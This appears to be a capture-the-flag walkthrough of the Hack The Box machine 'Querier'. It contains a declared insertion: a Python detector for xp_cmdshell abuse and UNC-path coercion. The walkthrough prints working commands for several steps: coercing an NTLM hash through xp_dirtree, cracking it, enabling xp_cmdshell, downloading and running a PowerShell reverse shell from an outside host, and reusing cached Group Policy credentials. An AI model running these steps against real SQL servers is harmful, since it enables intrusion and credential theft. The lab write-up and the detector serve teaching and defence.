If we open this file with LibreOffice, for example, we will see the following warning. We can see those macros in Tools -> Macros -> Edit Macros.

root@kali:/home/kali# mssqlclient.py -windows-auth QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125

SQL> EXEC xp_cmdshell "whoami"

SQL> EXEC master.dbo.xp_dirtree '\\10.10.14.44\caca';

Output: mssql-svc::QUERIER:9e51c633b81c9d7c:CF6FAD68C05BD1573BC621DB7764DF27:0101000000000000C0653150DE09D2018B9B9E34637AA2E6000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000006D0404BDD5AC85ACAAD036F2286C48FE53F058BCF53D964EC7A0F076F4A908D80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0034003400000000000000000000000000

root@kali:/home/kali# hashcat -m 5600 hash rockyou.txt --force

Output:

corporate568

root@kali:/home/kali# /home/kali/impacket/examples/mssqlclient.py -windows-auth mssql-svc:corporate568@10.10.10.125

SQL> EXEC xp_cmdshell 'whoami'

SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

SQL> EXEC xp_cmdshell 'whoami'

SQL> EXEC xp_cmdshell 'powershell -c "(New-Object System.Net.WebClient).DownloadFile(\"http://10.10.14.44:8080/Invoke-PowerShellTcp.ps1\",\"C:\Users\mssql-svc\Desktop\caca.ps1\")"'

SQL> EXEC xp_cmdshell 'powershell -ExecutionPolicy Bypass -File C:\Users\mssql-svc\Desktop\caca.ps1'

And on the listener:
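The SQL-side steps above (a UNC path handed to xp_dirtree, xp_cmdshell switched on through sp_configure, then OS commands run through it) each leave a distinct trace in SQL Server audit or Extended Events output. As an added example that is not part of the original writeup, here is a small Python detector run over constructed log records; the record layout, the sample lines and the rule names are assumptions, and the UNC rule also covers xp_fileexist and xp_subdirs, which take a path argument the same way xp_dirtree does.

```python
import re
from dataclasses import dataclass

# Constructed sample records (not from the original writeup), shaped like a
# simplified SQL Server Audit export: "<timestamp> login=<login> host=<client> batch=<T-SQL>".
SAMPLE_LOG = r"""
2019-03-01T10:02:11Z login=QUERIER\reporting host=10.10.14.44 batch=SELECT name FROM sys.databases
2019-03-01T10:03:45Z login=QUERIER\reporting host=10.10.14.44 batch=EXEC master.dbo.xp_dirtree '\\10.10.14.44\caca';
2019-03-01T10:09:02Z login=mssql-svc host=10.10.14.44 batch=EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
2019-03-01T10:09:30Z login=mssql-svc host=10.10.14.44 batch=EXEC xp_cmdshell 'whoami'
2019-03-01T10:15:00Z login=app_user host=10.0.0.5 batch=EXEC dbo.usp_report @id=7
"""

RECORD_RE = re.compile(r"^(?P<ts>\S+) login=(?P<login>\S+) host=(?P<host>\S+) batch=(?P<batch>.*)$")

# Each rule: (name, regex applied to the T-SQL batch, why it matters to a defender)
RULES = [
    ("xp_cmdshell_enabled",
     re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I),
     "xp_cmdshell turned on at runtime; it is disabled by default and rarely needed"),
    ("xp_cmdshell_exec",
     re.compile(r"exec(?:ute)?\s+(?:master\.(?:dbo)?\.?)?xp_cmdshell\b", re.I),
     "OS command executed under the SQL Server service account"),
    ("unc_path_coercion",
     re.compile(r"xp_(?:dirtree|fileexist|subdirs)\s+'?\\\\[^\\'\s]+\\", re.I),
     "file procedure given a UNC path: the service account authenticates outbound (NTLM capture/relay risk)"),
]

@dataclass
class Finding:
    ts: str
    login: str
    host: str
    rule: str
    reason: str

def scan_log(text: str) -> list[Finding]:
    """Return one Finding per (record, matching rule); one batch can trigger several rules."""
    findings = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue  # blank or malformed record: skip rather than crash
        for name, pattern, reason in RULES:
            if pattern.search(m["batch"]):
                findings.append(Finding(m["ts"], m["login"], m["host"], name, reason))
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.login}@{f.host}: {f.rule} - {f.reason}")
```

On the sample data the scan flags the xp_dirtree call, the sp_configure change and the xp_cmdshell execution, in that order, and nothing for the ordinary queries.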

root@kali:/home/kali# git clone https://github.com/PowerShellMafia/PowerSploit.git

Run Invoke-AllChecks to search for escalation vectors; it reports that the Administrator credentials are cached in a Groups.xml file (Group Policy Preferences).

PS C:\windows\system32> Invoke-AllChecks

From this we get:

Passwords : MyUnclesAreMarioAndLuigi!!1!

root@kali:/home/kali# psexec.py Administrator@10.10.10.125

Hi, I’m saksham dixit
